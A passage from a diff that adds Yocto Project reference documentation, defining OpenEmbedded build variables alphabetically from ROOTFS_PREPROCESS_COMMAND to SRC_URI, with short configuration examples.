+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`ROOTFS_PREPROCESS_COMMAND`
+ Specifies a list of functions to call before the OpenEmbedded build
+ system has created the root filesystem. You can specify functions
+ separated by semicolons:
+ ::
+
+ ROOTFS_PREPROCESS_COMMAND += "function; ... "
+
+ If you need to pass the root filesystem path to a command within a
+ function, you can use ``${IMAGE_ROOTFS}``, which points to the
+ directory that becomes the root filesystem image. See the
+ :term:`IMAGE_ROOTFS` variable for more
+ information.
+
+ :term:`RPROVIDES`
+ A list of package name aliases that a package also provides. These
+ aliases are useful for satisfying runtime dependencies of other
+ packages both during the build and on the target (as specified by
+ ``RDEPENDS``).
+
+ .. note::
+
+ A package's own name is implicitly already in its ``RPROVIDES`` list.
+
+ As with all package-controlling variables, you must always use the
+ variable in conjunction with a package name override. Here is an
+ example:
+ ::
+
+ RPROVIDES_${PN} = "widget-abi-2"
+
+ :term:`RRECOMMENDS`
+ A list of packages that extends the usability of a package being
+ built. The package being built does not depend on this list of
+ packages in order to successfully build, but rather uses them for
+ extended usability. To specify runtime dependencies for packages, see
+ the ``RDEPENDS`` variable.
+
+ The package manager will automatically install the ``RRECOMMENDS``
+ list of packages when installing the built package. However, you can
+ prevent listed packages from being installed by using the
+ :term:`BAD_RECOMMENDATIONS`,
+ :term:`NO_RECOMMENDATIONS`, and
+ :term:`PACKAGE_EXCLUDE` variables.
+
+ Packages specified in ``RRECOMMENDS`` need not actually be produced.
+ However, a recipe must exist that provides each package, either
+ through the :term:`PACKAGES` or
+ :term:`PACKAGES_DYNAMIC` variables or the
+ :term:`RPROVIDES` variable, or an error will occur
+ during the build. If such a recipe does exist and the package is not
+ produced, the build continues without error.
+
+ Because the ``RRECOMMENDS`` variable applies to packages being built,
+ you should always attach an override to the variable to specify the
+ particular package whose usability is being extended. For example,
+ suppose you are building a development package that is extended to
+ support wireless functionality. In this case, you would use the
+ following:
+ ::
+
+ RRECOMMENDS_${PN}-dev += "wireless_package_name"
+
+ In the
+ example, the package name (``${PN}-dev``) must appear as it would in
+ the ``PACKAGES`` namespace before any renaming of the output package
+ by classes such as ``debian.bbclass``.
+
+ BitBake, which the OpenEmbedded build system uses, supports
+ specifying versioned recommends. Although the syntax varies depending
+ on the packaging format, BitBake hides these differences from you.
+ Here is the general syntax to specify versions with the
+ ``RRECOMMENDS`` variable:
+ ::
+
+ RRECOMMENDS_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following:
+
+ - =
+ - <
+ - >
+ - <=
+ - >=
+
+ For example, the following sets up a recommend on version 1.2 or
+ greater of the package ``foo``:
+ ::
+
+ RRECOMMENDS_${PN} = "foo (>= 1.2)"
+
+ :term:`RREPLACES`
+ A list of packages replaced by a package. The package manager uses
+ this variable to determine which package should be installed to
+ replace other package(s) during an upgrade. In order to also have the
+ other package(s) removed at the same time, you must add the name of
+ the other package to the ``RCONFLICTS`` variable.
+
+ As with all package-controlling variables, you must use this variable
+ in conjunction with a package name override. Here is an example:
+ ::
+
+ RREPLACES_${PN} = "other_package_being_replaced"
+
+ BitBake, which the OpenEmbedded build system uses, supports
+ specifying versioned replacements. Although the syntax varies
+ depending on the packaging format, BitBake hides these differences
+ from you. Here is the general syntax to specify versions with the
+ ``RREPLACES`` variable:
+ ::
+
+ RREPLACES_${PN} = "package (operator version)"
+
+ For ``operator``, you can specify the following:
+
+ - =
+ - <
+ - >
+ - <=
+ - >=
+
+ For example, the following sets up a replacement using version 1.2
+ or greater of the package ``foo``:
+ ::
+
+ RREPLACES_${PN} = "foo (>= 1.2)"
+
+ :term:`RSUGGESTS`
+ A list of additional packages that you can suggest for installation
+ by the package manager at the time a package is installed. Not all
+ package managers support this functionality.
+
+ As with all package-controlling variables, you must always use this
+ variable in conjunction with a package name override. Here is an
+ example:
+ ::
+
+ RSUGGESTS_${PN} = "useful_package another_package"
+
+ :term:`S`
+ The location in the :term:`Build Directory` where
+ unpacked recipe source code resides. By default, this directory is
+ ``${``\ :term:`WORKDIR`\ ``}/${``\ :term:`BPN`\ ``}-${``\ :term:`PV`\ ``}``,
+ where ``${BPN}`` is the base recipe name and ``${PV}`` is the recipe
+ version. If the source tarball extracts the code to a directory named
+ anything other than ``${BPN}-${PV}``, or if the source code is
+ fetched from an SCM such as Git or Subversion, then you must set
+ ``S`` in the recipe so that the OpenEmbedded build system knows where
+ to find the unpacked source.
+
+ As an example, assume a :term:`Source Directory`
+ top-level folder named ``poky`` and a default Build Directory at
+ ``poky/build``. In this case, the work directory the build system
+ uses to keep the unpacked recipe for ``db`` is the following:
+ ::
+
+ poky/build/tmp/work/qemux86-poky-linux/db/5.1.19-r3/db-5.1.19
+
+ The unpacked source code resides in the ``db-5.1.19`` folder.
+
+ This next example assumes a Git repository. By default, Git
+ repositories are cloned to ``${WORKDIR}/git`` during
+ :ref:`ref-tasks-fetch`. Since this path is different
+ from the default value of ``S``, you must set it specifically so the
+ source can be located:
+ ::
+
+ SRC_URI = "git://path/to/repo.git"
+ S = "${WORKDIR}/git"
+
+ :term:`SANITY_REQUIRED_UTILITIES`
+ Specifies a list of command-line utilities that should be checked for
+ during the initial sanity checking process when running BitBake. If
+ any of the utilities are not installed on the build host, then
+ BitBake immediately exits with an error.
+
+ :term:`SANITY_TESTED_DISTROS`
+ A list of the host distribution identifiers that the build system has
+ been tested against. Identifiers consist of the host distributor ID
+ followed by the release, as reported by the ``lsb_release`` tool or
+ as read from ``/etc/lsb-release``. Separate the list items with
+ explicit newline characters (``\n``). If ``SANITY_TESTED_DISTROS`` is
+ not empty and the current value of
+ :term:`NATIVELSBSTRING` does not appear in the
+ list, then the build system reports a warning that indicates the
+ current host distribution has not been tested as a build host.
+
+ :term:`SDK_ARCH`
+ The target architecture for the SDK. Typically, you do not directly
+ set this variable. Instead, use :term:`SDKMACHINE`.
+
+ :term:`SDK_DEPLOY`
+ The directory set up and used by the
+ :ref:`populate_sdk_base <ref-classes-populate-sdk>` class to which
+ the SDK is deployed. The ``populate_sdk_base`` class defines
+ ``SDK_DEPLOY`` as follows:
+ ::
+
+ SDK_DEPLOY = "${TMPDIR}/deploy/sdk"
+
+ :term:`SDK_DIR`
+ The parent directory used by the OpenEmbedded build system when
+ creating SDK output. The
+ :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class defines
+ the variable as follows:
+ ::
+
+ SDK_DIR = "${WORKDIR}/sdk"
+
+ .. note::
+
+ The ``SDK_DIR`` directory is a temporary directory as it is part of
+ ``WORKDIR``. The final output directory is :term:`SDK_DEPLOY`.
+
+ :term:`SDK_EXT_TYPE`
+ Controls whether or not shared state artifacts are copied into the
+ extensible SDK. The default value of "full" copies all of the
+ required shared state artifacts into the extensible SDK. The value
+ "minimal" leaves these artifacts out of the SDK.
+
+ .. note::
+
+ If you set the variable to "minimal", you need to ensure
+ :term:`SSTATE_MIRRORS` is set in the SDK's configuration to enable the
+ artifacts to be fetched as needed.
+
+ :term:`SDK_HOST_MANIFEST`
+ The manifest file for the host part of the SDK. This file lists all
+ the installed packages that make up the host part of the SDK. The
+ file contains package information on a line-per-package basis as
+ follows:
+ ::
+
+ packagename packagearch version
+
+ The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class
+ defines the manifest file as follows:
+ ::
+
+ SDK_HOST_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.host.manifest"
+
+ The location is derived using the :term:`SDK_DEPLOY` and
+ :term:`TOOLCHAIN_OUTPUTNAME` variables.
+
+ :term:`SDK_INCLUDE_PKGDATA`
+ When set to "1", specifies to include the packagedata for all recipes
+ in the "world" target in the extensible SDK. Including this data
+ allows the ``devtool search`` command to find these recipes in search
+ results, as well as allows the ``devtool add`` command to map
+ dependencies more effectively.
+
+ .. note::
+
+ Enabling the ``SDK_INCLUDE_PKGDATA``
+ variable significantly increases build time because all of world
+ needs to be built. Enabling the variable also slightly increases
+ the size of the extensible SDK.
+
+ :term:`SDK_INCLUDE_TOOLCHAIN`
+ When set to "1", specifies to include the toolchain in the extensible
+ SDK. Including the toolchain is useful particularly when
+ :term:`SDK_EXT_TYPE` is set to "minimal" to keep
+ the SDK reasonably small but you still want to provide a usable
+ toolchain. For example, suppose you want to use the toolchain from an
+ IDE or from other tools and you do not want to perform additional
+ steps to install the toolchain.
+
+ The ``SDK_INCLUDE_TOOLCHAIN`` variable defaults to "0" if
+ ``SDK_EXT_TYPE`` is set to "minimal", and defaults to "1" if
+ ``SDK_EXT_TYPE`` is set to "full".
+
+ :term:`SDK_INHERIT_BLACKLIST`
+ A list of classes to remove from the :term:`INHERIT`
+ value globally within the extensible SDK configuration. The
+ :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class sets the
+ default value:
+ ::
+
+ SDK_INHERIT_BLACKLIST ?= "buildhistory icecc"
+
+ Some classes are not generally applicable within the extensible SDK
+ context. You can use this variable to disable those classes.
+
+ For additional information on how to customize the extensible SDK's
+ configuration, see the
+ ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ :term:`SDK_LOCAL_CONF_BLACKLIST`
+ A list of variables not allowed through from the OpenEmbedded build
+ system configuration into the extensible SDK configuration. Usually,
+ these are variables that are specific to the machine on which the
+ build system is running and thus would be potentially problematic
+ within the extensible SDK.
+
+ By default, ``SDK_LOCAL_CONF_BLACKLIST`` is set in the
+ :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class and
+ excludes the following variables:
+
+ - :term:`CONF_VERSION`
+ - :term:`BB_NUMBER_THREADS`
+ - :term:`bitbake:BB_NUMBER_PARSE_THREADS`
+ - :term:`PARALLEL_MAKE`
+ - :term:`PRSERV_HOST`
+ - :term:`SSTATE_MIRRORS` :term:`DL_DIR`
+ - :term:`SSTATE_DIR` :term:`TMPDIR`
+ - :term:`BB_SERVER_TIMEOUT`
+
+ For additional information on how to customize the extensible SDK's
+ configuration, see the
+ ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ :term:`SDK_LOCAL_CONF_WHITELIST`
+ A list of variables allowed through from the OpenEmbedded build
+ system configuration into the extensible SDK configuration. By
+ default, the list of variables is empty and is set in the
+ :ref:`populate-sdk-ext <ref-classes-populate-sdk-*>` class.
+
+ This list overrides the variables specified using the
+ :term:`SDK_LOCAL_CONF_BLACKLIST`
+ variable as well as any variables identified by automatic
+ blacklisting due to the "/" character being found at the start of the
+ value, which is usually indicative of being a path and thus might not
+ be valid on the system where the SDK is installed.
+
+ For additional information on how to customize the extensible SDK's
+ configuration, see the
+ ":ref:`sdk-manual/sdk-appendix-customizing:configuring the extensible sdk`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ :term:`SDK_NAME`
+ The base name for SDK output files. The name is derived from the
+ :term:`DISTRO`, :term:`TCLIBC`,
+ :term:`SDK_ARCH`,
+ :term:`IMAGE_BASENAME`, and
+ :term:`TUNE_PKGARCH` variables:
+ ::
+
+ SDK_NAME = "${DISTRO}-${TCLIBC}-${SDK_ARCH}-${IMAGE_BASENAME}-${TUNE_PKGARCH}"
+
+ :term:`SDK_OS`
+ Specifies the operating system for which the SDK will be built. The
+ default value is the value of :term:`BUILD_OS`.
+
+ :term:`SDK_OUTPUT`
+ The location used by the OpenEmbedded build system when creating SDK
+ output. The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>`
+ class defines the variable as follows:
+ ::
+
+ SDK_DIR = "${WORKDIR}/sdk"
+ SDK_OUTPUT = "${SDK_DIR}/image"
+ SDK_DEPLOY = "${DEPLOY_DIR}/sdk"
+
+ .. note::
+
+ The ``SDK_OUTPUT`` directory is a temporary directory as it is part of
+ :term:`WORKDIR` by way of :term:`SDK_DIR`. The final output directory is
+ :term:`SDK_DEPLOY`.
+
+ :term:`SDK_PACKAGE_ARCHS`
+ Specifies a list of architectures compatible with the SDK machine.
+ This variable is set automatically and should not normally be
+ hand-edited. Entries are separated using spaces and listed in order
+ of priority. The default value for ``SDK_PACKAGE_ARCHS`` is "all any
+ noarch ${SDK_ARCH}-${SDKPKGSUFFIX}".
+
+ :term:`SDK_POSTPROCESS_COMMAND`
+ Specifies a list of functions to call once the OpenEmbedded build
+ system creates the SDK. You can specify functions separated by
+ semicolons: SDK_POSTPROCESS_COMMAND += "function; ... "
+
+ If you need to pass an SDK path to a command within a function, you
+ can use ``${SDK_DIR}``, which points to the parent directory used by
+ the OpenEmbedded build system when creating SDK output. See the
+ :term:`SDK_DIR` variable for more information.
+
+ :term:`SDK_PREFIX`
+ The toolchain binary prefix used for ``nativesdk`` recipes. The
+ OpenEmbedded build system uses the ``SDK_PREFIX`` value to set the
+ :term:`TARGET_PREFIX` when building
+ ``nativesdk`` recipes. The default value is "${SDK_SYS}-".
+
+ :term:`SDK_RECRDEP_TASKS`
+ A list of shared state tasks added to the extensible SDK. By default,
+ the following tasks are added:
+
+ - do_populate_lic
+ - do_package_qa
+ - do_populate_sysroot
+ - do_deploy
+
+ Despite the default value of "" for the
+ ``SDK_RECRDEP_TASKS`` variable, the above four tasks are always added
+ to the SDK. To specify tasks beyond these four, you need to use the
+ ``SDK_RECRDEP_TASKS`` variable (e.g. you are defining additional
+ tasks that are needed in order to build
+ :term:`SDK_TARGETS`).
+
+ :term:`SDK_SYS`
+ Specifies the system, including the architecture and the operating
+ system, for which the SDK will be built.
+
+ The OpenEmbedded build system automatically sets this variable based
+ on :term:`SDK_ARCH`,
+ :term:`SDK_VENDOR`, and
+ :term:`SDK_OS`. You do not need to set the ``SDK_SYS``
+ variable yourself.
+
+ :term:`SDK_TARGET_MANIFEST`
+ The manifest file for the target part of the SDK. This file lists all
+ the installed packages that make up the target part of the SDK. The
+ file contains package information on a line-per-package basis as
+ follows:
+ ::
+
+ packagename packagearch version
+
+ The :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class
+ defines the manifest file as follows:
+ ::
+
+ SDK_TARGET_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.target.manifest"
+
+ The location is derived using the :term:`SDK_DEPLOY` and
+ :term:`TOOLCHAIN_OUTPUTNAME` variables.
+
+ :term:`SDK_TARGETS`
+ A list of targets to install from shared state as part of the
+ standard or extensible SDK installation. The default value is "${PN}"
+ (i.e. the image from which the SDK is built).
+
+ The ``SDK_TARGETS`` variable is an internal variable and typically
+ would not be changed.
+
+ :term:`SDK_TITLE`
+ The title to be printed when running the SDK installer. By default,
+ this title is based on the :term:`DISTRO_NAME` or
+ :term:`DISTRO` variable and is set in the
+ :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class as
+ follows:
+ ::
+
+ SDK_TITLE ??= "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} SDK"
+
+ For the default distribution "poky",
+ ``SDK_TITLE`` is set to "Poky (Yocto Project Reference Distro)".
+
+ For information on how to change this default title, see the
+ ":ref:`sdk-manual/sdk-appendix-customizing:changing the extensible sdk installer title`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ :term:`SDK_UPDATE_URL`
+ An optional URL for an update server for the extensible SDK. If set,
+ the value is used as the default update server when running
+ ``devtool sdk-update`` within the extensible SDK.
+
+ :term:`SDK_VENDOR`
+ Specifies the name of the SDK vendor.
+
+ :term:`SDK_VERSION`
+ Specifies the version of the SDK. The distribution configuration file
+ (e.g. ``/meta-poky/conf/distro/poky.conf``) defines the
+ ``SDK_VERSION`` as follows:
+ ::
+
+ SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}','snapshot')}"
+
+ For additional information, see the
+ :term:`DISTRO_VERSION` and
+ :term:`DATE` variables.
+
+ :term:`SDKEXTPATH`
+ The default installation directory for the Extensible SDK. By
+ default, this directory is based on the :term:`DISTRO`
+ variable and is set in the
+ :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class as
+ follows:
+ ::
+
+ SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
+
+ For the
+ default distribution "poky", the ``SDKEXTPATH`` is set to "poky_sdk".
+
+ For information on how to change this default directory, see the
+ ":ref:`sdk-manual/sdk-appendix-customizing:changing the default sdk installation directory`"
+ section in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+ :term:`SDKIMAGE_FEATURES`
+ Equivalent to ``IMAGE_FEATURES``. However, this variable applies to
+ the SDK generated from an image using the following command:
+ ::
+
+ $ bitbake -c populate_sdk imagename
+
+ :term:`SDKMACHINE`
+ The machine for which the SDK is built. In other words, the SDK is
+ built such that it runs on the target you specify with the
+ ``SDKMACHINE`` value. The value points to a corresponding ``.conf``
+ file under ``conf/machine-sdk/``.
+
+ You can use "i686" and "x86_64" as possible values for this variable.
+ The variable defaults to "i686" and is set in the local.conf file in
+ the Build Directory.
+ ::
+
+ SDKMACHINE ?= "i686"
+
+ .. note::
+
+ You cannot set the ``SDKMACHINE``
+ variable in your distribution configuration file. If you do, the
+ configuration will not take affect.
+
+ :term:`SDKPATH`
+ Defines the path offered to the user for installation of the SDK that
+ is generated by the OpenEmbedded build system. The path appears as
+ the default location for installing the SDK when you run the SDK's
+ installation script. You can override the offered path when you run
+ the script.
+
+ :term:`SDKTARGETSYSROOT`
+ The full path to the sysroot used for cross-compilation within an SDK
+ as it will be when installed into the default
+ :term:`SDKPATH`.
+
+ :term:`SECTION`
+ The section in which packages should be categorized. Package
+ management utilities can make use of this variable.
+
+ :term:`SELECTED_OPTIMIZATION`
+ Specifies the optimization flags passed to the C compiler when
+ building for the target. The flags are passed through the default
+ value of the :term:`TARGET_CFLAGS` variable.
+
+ The ``SELECTED_OPTIMIZATION`` variable takes the value of
+ ``FULL_OPTIMIZATION`` unless ``DEBUG_BUILD`` = "1". If that is the
+ case, the value of ``DEBUG_OPTIMIZATION`` is used.
+
+ :term:`SERIAL_CONSOLE`
+ Defines a serial console (TTY) to enable using
+ `getty <https://en.wikipedia.org/wiki/Getty_(Unix)>`__. Provide a
+ value that specifies the baud rate followed by the TTY device name
+ separated by a space. You cannot specify more than one TTY device:
+ ::
+
+ SERIAL_CONSOLE = "115200 ttyS0"
+
+ .. note::
+
+ The ``SERIAL_CONSOLE`` variable is deprecated. Please use the
+ :term:`SERIAL_CONSOLES` variable.
+
+ :term:`SERIAL_CONSOLES`
+ Defines a serial console (TTY) to enable using
+ `getty <https://en.wikipedia.org/wiki/Getty_(Unix)>`__. Provide a
+ value that specifies the baud rate followed by the TTY device name
+ separated by a semicolon. Use spaces to separate multiple devices:
+ ::
+
+ SERIAL_CONSOLES = "115200;ttyS0 115200;ttyS1"
+
+ :term:`SERIAL_CONSOLES_CHECK`
+ Specifies serial consoles, which must be listed in
+ :term:`SERIAL_CONSOLES`, to check against
+ ``/proc/console`` before enabling them using getty. This variable
+ allows aliasing in the format: <device>:<alias>. If a device was
+ listed as "sclp_line0" in ``/dev/`` and "ttyS0" was listed in
+ ``/proc/console``, you would do the following: ::
+
+ SERIAL_CONSOLES_CHECK = "slcp_line0:ttyS0"
+
+ This variable is currently only supported with SysVinit (i.e. not
+ with systemd).
+
+ :term:`SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS`
+ A list of recipe dependencies that should not be used to determine
+ signatures of tasks from one recipe when they depend on tasks from
+ another recipe. For example: ::
+
+ SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "intone->mplayer2"
+
+ In the previous example, ``intone`` depends on ``mplayer2``.
+
+ You can use the special token ``"*"`` on the left-hand side of the
+ dependency to match all recipes except the one on the right-hand
+ side. Here is an example: ::
+
+ SIGGEN_EXCLUDE_SAFE_RECIPE_DEPS += "*->quilt-native"
+
+ In the previous example, all recipes except ``quilt-native`` ignore
+ task signatures from the ``quilt-native`` recipe when determining
+ their task signatures.
+
+ Use of this variable is one mechanism to remove dependencies that
+ affect task signatures and thus force rebuilds when a recipe changes.
+
+ .. note::
+
+ If you add an inappropriate dependency for a recipe relationship,
+ the software might break during runtime if the interface of the
+ second recipe was changed after the first recipe had been built.
+
+ :term:`SIGGEN_EXCLUDERECIPES_ABISAFE`
+ A list of recipes that are completely stable and will never change.
+ The ABI for the recipes in the list are presented by output from the
+ tasks run to build the recipe. Use of this variable is one way to
+ remove dependencies from one recipe on another that affect task
+ signatures and thus force rebuilds when the recipe changes.
+
+ .. note::
+
+ If you add an inappropriate variable to this list, the software
+ might break at runtime if the interface of the recipe was changed
+ after the other had been built.
+
+ :term:`SITEINFO_BITS`
+ Specifies the number of bits for the target system CPU. The value
+ should be either "32" or "64".
+
+ :term:`SITEINFO_ENDIANNESS`
+ Specifies the endian byte order of the target system. The value
+ should be either "le" for little-endian or "be" for big-endian.
+
+ :term:`SKIP_FILEDEPS`
+ Enables removal of all files from the "Provides" section of an RPM
+ package. Removal of these files is required for packages containing
+ prebuilt binaries and libraries such as ``libstdc++`` and ``glibc``.
+
+ To enable file removal, set the variable to "1" in your
+ ``conf/local.conf`` configuration file in your:
+ :term:`Build Directory`.
+ ::
+
+ SKIP_FILEDEPS = "1"
+
+ :term:`SOC_FAMILY`
+ Groups together machines based upon the same family of SOC (System On
+ Chip). You typically set this variable in a common ``.inc`` file that
+ you include in the configuration files of all the machines.
+
+ .. note::
+
+ You must include ``conf/machine/include/soc-family.inc`` for this
+ variable to appear in :term:`MACHINEOVERRIDES`.
+
+ :term:`SOLIBS`
+ Defines the suffix for shared libraries used on the target platform.
+ By default, this suffix is ".so.*" for all Linux-based systems and is
+ defined in the ``meta/conf/bitbake.conf`` configuration file.
+
+ You will see this variable referenced in the default values of
+ ``FILES_${PN}``.
+
+ :term:`SOLIBSDEV`
+ Defines the suffix for the development symbolic link (symlink) for
+ shared libraries on the target platform. By default, this suffix is
+ ".so" for Linux-based systems and is defined in the
+ ``meta/conf/bitbake.conf`` configuration file.
+
+ You will see this variable referenced in the default values of
+ ``FILES_${PN}-dev``.
+
+ :term:`SOURCE_MIRROR_FETCH`
+ When you are fetching files to create a mirror of sources (i.e.
+ creating a source mirror), setting ``SOURCE_MIRROR_FETCH`` to "1" in
+ your ``local.conf`` configuration file ensures the source for all
+ recipes are fetched regardless of whether or not a recipe is
+ compatible with the configuration. A recipe is considered
+ incompatible with the currently configured machine when either or
+ both the :term:`COMPATIBLE_MACHINE`
+ variable and :term:`COMPATIBLE_HOST` variables
+ specify compatibility with a machine other than that of the current
+ machine or host.
+
+ .. note::
+
+ Do not set the ``SOURCE_MIRROR_FETCH``
+ variable unless you are creating a source mirror. In other words,
+ do not set the variable during a normal build.
+
+ :term:`SOURCE_MIRROR_URL`
+ Defines your own :term:`PREMIRRORS` from which to
+ first fetch source before attempting to fetch from the upstream
+ specified in :term:`SRC_URI`.
+
+ To use this variable, you must globally inherit the
+ :ref:`own-mirrors <ref-classes-own-mirrors>` class and then provide
+ the URL to your mirrors. Here is the general syntax:
+ ::
+
+ INHERIT += "own-mirrors"
+ SOURCE_MIRROR_URL = "http://example.com/my_source_mirror"
+
+ .. note::
+
+ You can specify only a single URL in ``SOURCE_MIRROR_URL``.
+
+ :term:`SPDXLICENSEMAP`
+ Maps commonly used license names to their SPDX counterparts found in
+ ``meta/files/common-licenses/``. For the default ``SPDXLICENSEMAP``
+ mappings, see the ``meta/conf/licenses.conf`` file.
+
+ For additional information, see the :term:`LICENSE`
+ variable.
+
+ :term:`SPECIAL_PKGSUFFIX`
+ A list of prefixes for :term:`PN` used by the OpenEmbedded
+ build system to create variants of recipes or packages. The list
+ specifies the prefixes to strip off during certain circumstances such
+ as the generation of the :term:`BPN` variable.
+
+ :term:`SPL_BINARY`
+ The file type for the Secondary Program Loader (SPL). Some devices
+ use an SPL from which to boot (e.g. the BeagleBone development
+ board). For such cases, you can declare the file type of the SPL
+ binary in the ``u-boot.inc`` include file, which is used in the
+ U-Boot recipe.
+
+ The SPL file type is set to "null" by default in the ``u-boot.inc``
+ file as follows:
+ ::
+
+ # Some versions of u-boot build an SPL (Second Program Loader) image that
+ # should be packaged along with the u-boot binary as well as placed in the
+ # deploy directory. For those versions they can set the following variables
+ # to allow packaging the SPL.
+ SPL_BINARY ?= ""
+ SPL_BINARYNAME ?= "${@os.path.basename(d.getVar("SPL_BINARY"))}"
+ SPL_IMAGE ?= "${SPL_BINARYNAME}-${MACHINE}-${PV}-${PR}"
+ SPL_SYMLINK ?= "${SPL_BINARYNAME}-${MACHINE}"
+
+ The ``SPL_BINARY`` variable helps form
+ various ``SPL_*`` variables used by the OpenEmbedded build system.
+
+ See the BeagleBone machine configuration example in the
+ ":ref:`dev-manual/dev-manual-common-tasks:adding a layer using the \`\`bitbake-layers\`\` script`"
+ section in the Yocto Project Board Support Package Developer's Guide
+ for additional information.
+
+ :term:`SRC_URI`
+ The list of source files - local or remote. This variable tells the
+ OpenEmbedded build system which bits to pull in for the build and how
+ to pull them in. For example, if the recipe or append file only needs
+ to fetch a tarball from the Internet, the recipe or append file uses
+ a single ``SRC_URI`` entry. On the other hand, if the recipe or
+ append file needs to fetch a tarball, apply two patches, and include
+ a custom file, the recipe or append file would include four instances
+ of the variable.
+
+ The following list explains the available URI protocols. URI
+ protocols are highly dependent on particular BitBake Fetcher
+ submodules. Depending on the fetcher BitBake uses, various URL
+ parameters are employed. For specifics on the supported Fetchers, see
+ the ":ref:`Fetchers <bitbake:bb-fetchers>`" section in the
+ BitBake User Manual.
+
+ - ``file://`` - Fetches files, which are usually files shipped
+ with the :term:`Metadata`, from the local machine (e.g.
+ :ref:`patch <patching-dev-environment>` files).
+ The path is relative to the :term:`FILESPATH`
+ variable. Thus, the build system searches, in order, from the
+ following directories, which are assumed to be a subdirectories of
+ the directory in which the recipe file (``.bb``) or append file
+ (``.bbappend``) resides:
+
+ - ``${BPN}`` - The base recipe name without any special suffix
+ or version numbers.
+
+ - ``${BP}`` - ``${BPN}-${PV}``. The base recipe name and
+ version but without any special package name suffix.
+
+ - *files -* Files within a directory, which is named ``files``
+ and is also alongside the recipe or append file.
+
+ .. note::
+
+ If you want the build system to pick up files specified through
+ a
+ SRC_URI
+ statement from your append file, you need to be sure to extend
+ the
+ FILESPATH
+ variable by also using the
+ FILESEXTRAPATHS
+ variable from within your append file.
+
+ - ``bzr://`` - Fetches files from a Bazaar revision control
+ repository.
+
+ - ``git://`` - Fetches files from a Git revision control
+ repository.
+
+ - ``osc://`` - Fetches files from an OSC (OpenSUSE Build service)
+ revision control repository.
+
+ - ``repo://`` - Fetches files from a repo (Git) repository.
+
+ - ``ccrc://`` - Fetches files from a ClearCase repository.
+
+ - ``http://`` - Fetches files from the Internet using ``http``.
+
+ - ``https://`` - Fetches files from the Internet using ``https``.
+
+ - ``ftp://`` - Fetches files from the Internet using ``ftp``.
+
+ - ``cvs://`` - Fetches files from a CVS revision control
+ repository.
+
+ - ``hg://`` - Fetches files from a Mercurial (``hg``) revision
+ control repository.
+
+ - ``p4://`` - Fetches files from a Perforce (``p4``) revision
+ control repository.
+
+ - ``ssh://`` - Fetches files from a secure shell.
+
+ - ``svn://`` - Fetches files from a Subversion (``svn``) revision
+ control repository.
+
+ - ``npm://`` - Fetches JavaScript modules from a registry.
+
+ Standard and recipe-specific options for ``SRC_URI`` exist. Here are
+ standard options:
+
+ - ``apply`` - Whether to apply the patch or not. The default
+ action is to apply the patch.
+
+ - ``striplevel`` - Which striplevel to use when applying the
+ patch. The default level is 1.
+
+ - ``patchdir`` - Specifies the directory in which the patch should
+ be applied. The default is ``${``\ :term:`S`\ ``}``.
+
+ Here are options specific to recipes building code from a revision
+ control system:
+
+ - ``mindate`` - Apply the patch only if
+ :term:`SRCDATE` is equal to or greater than
+ ``mindate``.
+
+ - ``maxdate`` - Apply the patch only if ``SRCDATE`` is not later
+ than ``maxdate``.
+
+ - ``minrev`` - Apply the patch only if ``SRCREV`` is equal to or
+ greater than ``minrev``.
+
+ - ``maxrev`` - Apply the patch only if ``SRCREV`` is not later
+ than ``maxrev``.
+
+ - ``rev`` - Apply the patch only if ``SRCREV`` is equal to
+ ``rev``.
+
+ - ``notrev`` - Apply the patch only if ``SRCREV`` is not equal to
+ ``rev``.
+
+ Here are some additional options worth mentioning:
+
+ - ``unpack`` - Controls whether or not to unpack the file if it is
+ an archive. The default action is to unpack the file.
+
+ - ``destsuffix`` - Places the file (or extracts its contents) into
+ the specified subdirectory of :term:`WORKDIR` when
+ the Git fetcher is used.
+
+ - ``subdir`` - Places the file (or extracts its contents) into the
+ specified subdirectory of ``WORKDIR`` when the local (``file://``)
+ fetcher is used.
+
+ - ``localdir`` - Places the file (or extracts its contents) into
+ the specified subdirectory of ``WORKDIR`` when the CVS fetcher is
+ used.
+
+ - ``subpath`` - Limits the checkout to a specific subpath of the
+ tree when using the Git fetcher is used.
+
+ - ``name`` - Specifies a name to be used for association with
+ ``SRC_URI`` checksums or :term:`SRCREV` when you have more than one
+ file or git repository specified in ``SRC_URI``. For example:
+ ::
+
+ SRC_URI = "git://example.com/foo.git;name=first \
+ git://example.com/bar.git;name=second \
+ http://example.com/file.tar.gz;name=third"
+
+ SRCREV_first = "f1d2d2f924e986ac86fdf7b36c94bcdf32beec15"
+ SRCREV_second = "e242ed3bffccdf271b7fbaf34ed72d089537b42f"
+ SRC_URI[third.sha256sum] = "13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de"
+
+
+ - ``downloadfilename`` - Specifies the filename used when storing
+ the downloaded file.
+
+ :term:`SRC_URI_OVERRIDES_PACKAGE_ARCH`
+ By default, the OpenEmbedded build system automatically detects
